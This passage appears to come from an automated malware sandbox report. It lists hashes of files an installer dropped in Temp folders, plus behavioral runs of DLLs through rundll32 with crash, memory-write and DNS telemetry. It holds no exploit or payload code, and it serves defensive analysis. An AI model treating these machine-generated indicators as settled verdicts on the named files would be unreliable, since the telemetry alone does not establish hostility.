| SHA256 | 5a55320d6953efb5b565893e32e01f6dae781a16460df5502c8ba012c893edfd |
| SHA512 | 6076d43a73d5fa5192cbe597e018b268cfdc7efb94a6cb45dad5b0da9c3abf68aaf2ea06f3ad650b28a993605917b6d356339d79f8dd6962d2c40dbf4653ef83 |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\sl.pak
| MD5 | 435a2a5214f9b56dfadd5a6267041bd3 |
| SHA1 | 36bbc7ca3d998bfb1edc2ff8a3635553f96ca570 |
| SHA256 | 341c33514c627501026c3e5b9620cf0d9f482ab66b10a7e0fb112c7620b15600 |
| SHA512 | 55271935e18ac27c753431af86a7dcd1f4a768adef1b593ba8e218da34856a5f9faf9819a3ecce3f21f0607ba95100c5cb18cd1a7138ec563090d0391ad5b52d |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\sk.pak
| MD5 | f117e58e6eb53da1dbfa4c04a798e96f |
| SHA1 | e98cee0a94a9494c0cfc639bb9e42a4602c23236 |
| SHA256 | b46db20eeba11f8365296b54469fdd001579852dc1d49a01fc59d2a8bcf880a3 |
| SHA512 | dea792a63e0557d9e868c0310ec2a68b713daf5cf926389e05a0885cdb05433d20f35d087de269f9584795da50600966b8ff5dd95583861443a1e90564a89793 |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\ru.pak
| MD5 | 1a9b38ec75ccfa3214bef411a1ae0502 |
| SHA1 | de81af03fff427dfc5ffe548f27ed02acae3402d |
| SHA256 | 533f9e4af2dce2a6e049ac0eb6e2dbf0afe4b6f635236520aee2e4fa3176e995 |
| SHA512 | 05cf20aea71cdd077b0fa5f835812809ad22c3dbebc69e38ab2c9a26ad694ab50d6985aec61633b99713e7f57408c1c64ce2fb9ccdac26661b7167853bdd6148 |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\sv.pak
| MD5 | e4c9ced1a36ea7b71634e4df9618804f |
| SHA1 | c966c8eb9763a9147854989ea443c6be0634db27 |
| SHA256 | e5cccdb241938f4a6b9af5a245abe0e0218c72e08a73db3ed0452c6ddfb9c379 |
| SHA512 | d07a4d62f22a1830d3ec44f0c347e4a7d70b35ceba126cbdc246a7b3ee7eda85e2338bab3edc7223f579964868136bb10d42c05e0e0ff9f73447b3606d9b2c4e |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\th.pak
| MD5 | 4917873d8118906bdc08f31afb1ea078 |
| SHA1 | 49440a3b156d7703533367f8f13f66ec166db6e9 |
| SHA256 | d051b400096922089f6daa723fac18c9640ba203b2879aac4ca89b05738dd32d |
| SHA512 | 30e6446bad54b86be553fa293c7a92ec221adb54b99624ed69702df75347a98697158041a45f77ece4e7ed0fda41306ef21eb27981f24f0a4e42e8306175a88e |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\te.pak
| MD5 | 17b858cf23a206b5822f8b839d7c1ea3 |
| SHA1 | 115220668f153b36254951e9aa4ef0aa2be1ffc4 |
| SHA256 | d6180484b51aacbf59419e3a9b475a4419fb7d195aea7c3d58339f0f072c1457 |
| SHA512 | 7b919a5b451ec2ba15d377e4a3a6f99d63268e9be2865d674505584eed4fa190eaae589c9592276b996b7ce2fdfae80fda20feff9ea9adbb586308dfd7f12c2a |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\ta.pak
| MD5 | 5f80c9da0c09491c70123581a41f6dad |
| SHA1 | 3fc9560a954271cf09aaa54eec34963c72c06e85 |
| SHA256 | 30658d99d753946e9c9c02094c89be25b710db77251df6cd1a8839c29de5f884 |
| SHA512 | 072c5db7fe1eb9e6c270d0e9b439cf84ebb3dc374d4f01f01f9341030883f2d6d9c6970fb6ef14bf96fccb51eade9ca762f396f89ba1d3df1230dda68557fd4a |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\sw.pak
| MD5 | 59ff4e16b640ef41100243857efdd009 |
| SHA1 | f712b2d39618ffadcf68d1f2ab5a76da5be14d74 |
| SHA256 | c18a209f8ec3641c90ea8ced5343f943f034e09c8e75466e24dcabc070d08804 |
| SHA512 | 0e721a6cbf209ac35272ad292b2e5000d4e690062ddb498dbf6e8e6ee5f6e86d034a7303a46c2b85750245381c78efafc416ead13c1fe0ee5ec6088dd66adca2 |
C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\locales\ur.pak
| MD5 | 861ffd74ae5b392d578b3f3004c94ce3 |
| SHA1 | 8a4a05317a0f11d9d216b3e53e58475c301d7ea5 |
| SHA256 | b9f22a23368bf1e21f3085583ecb775cce8045176721ff6ae798b06bd2810dbc |
| SHA512 | 52ede35b7ed1fb6e51b18e450b95c3245d326f2afda646e3642ee68b714dcf9a726afe32e2759e9ea87a104f4a59e6fc2c60b3275aad8332ae1c626231e6747b |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\zh-CN.pak
| MD5 | 3210460a24f2e2a2edd15d6f43abbe5f |
| SHA1 | 608ff156286708ed94b7ae90c73568d6042e2dbd |
| SHA256 | 0f8d42d7f0b0b01aafad6ae79f0bd0ca518b2db94287b09df088bc093f15f605 |
| SHA512 | f97427dba4217e01a7ed395c453d03dda4f2258cba589258da0eacfde427bf442cddef541a23e7782914433e70a9623e904a5070deba9f9d50dda20732eb5e86 |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\vi.pak
| MD5 | 4076d3c0c0e5f31cf883198c980d1727 |
| SHA1 | db51b746216ea68803c98d7c1a5a2b45944359f3 |
| SHA256 | f1458c4ce4ca708e849eb0c68a5157360ef003f3a9c95628d5ca12ada303b379 |
| SHA512 | 80e4e960218f7d84423124c34352251411baf008e821a344a0b6c2e7f1483694010f28b7de21c7e2c69abb4ec92e0d9cbddeed6279b90c47245f4cbc500cdb77 |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\uk.pak
| MD5 | 381cb33c2d4fd0225c5c14447e6a84e0 |
| SHA1 | 686b888228f6dd95ade94fee62eb1d75f3e0fc93 |
| SHA256 | c2a6b16abeab6e18276bc1636555e93218763b9c99cacd0b42481b35e3a11820 |
| SHA512 | f7a2828aa4cd85f07a5d66832f247f70951abf34f81a282dc41ec51875ba70d940353d010b605c56cc59bee47309aa311099d4e6ebd17f3c1538521d0cddf4b6 |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\tr.pak
| MD5 | 55e06cd9356d0fb6f99932c2913afc92 |
| SHA1 | aa5c532ddb3f80d2f180ad62ce38351e519a5e45 |
| SHA256 | afcbf02420dc724059f70d1dc6ffa51f5dd75136d9e1e8671d92d5d14955edf9 |
| SHA512 | 813c180cb1aa205034497be5fc8a631ff117e5ed17cdf0ac59b7569d74d849b385852a15bbadd3146f942c58bab80d94bf0980d13ca4b4424d1cb1df0cb1a2cd |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\zh-TW.pak
| MD5 | f466116c7ce4962fe674383d543c87f6 |
| SHA1 | f65bf0dc1f1b15c132674fb8ff540f7d2afe1d6e |
| SHA256 | ff3a294fd1afb1fa7aaf53fbc4396643a12ed132633c5c86f14c16b88fa94a7b |
| SHA512 | 4851a08069fcac75e4051e53d4526789bfe6c393ab963e8263803bbf6e96cb150e9ba741650efb5ee500e8a757d8512eb17dc268cec1ab6fd3acfac62f7da27d |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\resources\elevate.exe
| MD5 | 792b92c8ad13c46f27c7ced0810694df |
| SHA1 | d8d449b92de20a57df722df46435ba4553ecc802 |
| SHA256 | 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37 |
| SHA512 | 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40 |
C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\StdUtils.dll
| MD5 | c6a6e03f77c313b267498515488c5740 |
| SHA1 | 3d49fc2784b9450962ed6b82b46e9c3c957d7c15 |
| SHA256 | b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e |
| SHA512 | 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803 |
C:\Users\Admin\AppData\Local\Temp\7e280c11-94d3-4ccf-be9f-f1208aa9ffd9.tmp.node
| MD5 | ba973fe2fa62e2bfa81c30cb0d77b2c2 |
| SHA1 | 69fed56755ea90b354ae637e88b04f9568c2a8cb |
| SHA256 | 9e39235c5b07ca875e8e139ca6b29fc97205875df5c009c3854f64a5cdeef778 |
| SHA512 | 867067ae3b58d10a914aefb8b9a3f9550b20f724ad6f5011d391f83f153fb9f3418ef27bc78008146b9b04657e72ebd827799fa3aff247a61b5986e83593c0cf |
C:\Users\Admin\AppData\Local\Temp\9b2d9968-ab92-427d-a1cf-ccecdc2ab69b.tmp.node
| MD5 | 56192831a7f808874207ba593f464415 |
| SHA1 | e0c18c72a62692d856da1f8988b0bc9c8088d2aa |
| SHA256 | 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c |
| SHA512 | c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33 |
C:\Users\Admin\AppData\Local\Temp\86c0865f-2ec7-47c2-95d2-2dc23ae37f1b.tmp.node
| MD5 | efe1f662b2b23a094b20f0a951c14b10 |
| SHA1 | 9f239fbdb6ec000710bf33923d29eddf65b357c7 |
| SHA256 | 04e3334cd62fc251145ac09a052b6a069634740c4b61825cce0f14a588542ec6 |
| SHA512 | 50c13ee918422fdc2e6e53e67f51a4b8eb22c84dda54f5afdcadd96e9ecf000097c6beb0778511a2e5ee93130694c4a66bc8a73db614c8b6faa1a70243e9ab07 |
memory/2956-574-0x000001F114F10000-0x000001F114F32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfm3g3tp.21x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a11402783a8686e08f8fa987dd07bca |
| SHA1 | 580df3865059f4e2d8be10644590317336d146ce |
| SHA256 | 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0 |
| SHA512 | 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510 |
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
memory/1884-655-0x000001B629000000-0x000001B629001000-memory.dmp
memory/1884-654-0x000001B629000000-0x000001B629001000-memory.dmp
memory/1884-653-0x000001B629000000-0x000001B629001000-memory.dmp
memory/1884-660-0x000001B629000000-0x000001B629001000-memory.dmp
memory/1884-665-0x000001B629000000-0x000001B629001000-memory.dmp
memory/1884-664-0x000001B629000000-0x000001B629001000-memory.dmp
memory/1884-663-0x000001B629000000-0x000001B629001000-memory.dmp
memory/1884-662-0x000001B629000000-0x000001B629001000-memory.dmp
memory/1884-661-0x000001B629000000-0x000001B629001000-memory.dmp
memory/1884-659-0x000001B629000000-0x000001B629001000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win10v2004-20240508-en
Max time kernel
51s
Max time network
53s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4356 wrote to memory of 1676 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4356 wrote to memory of 1676 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4356 wrote to memory of 1676 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1676 -ip 1676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 628
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win10v2004-20240426-en
Max time kernel
146s
Max time network
158s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.43.201.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win7-20240508-en
Max time kernel
118s
Max time network
126s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win10v2004-20240508-en
Max time kernel
48s
Max time network
55s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win7-20240221-en
Max time kernel
121s
Max time network
127s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2932 wrote to memory of 2112 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2932 wrote to memory of 2112 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2932 wrote to memory of 2112 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2932 -s 80
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win10v2004-20240508-en
Max time kernel
48s
Max time network
61s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win7-20240220-en
Max time kernel
120s
Max time network
126s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
Network
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win10v2004-20240508-en
Max time kernel
48s
Max time network
57s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:56
Platform
win7-20240221-en
Max time kernel
120s
Max time network
145s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"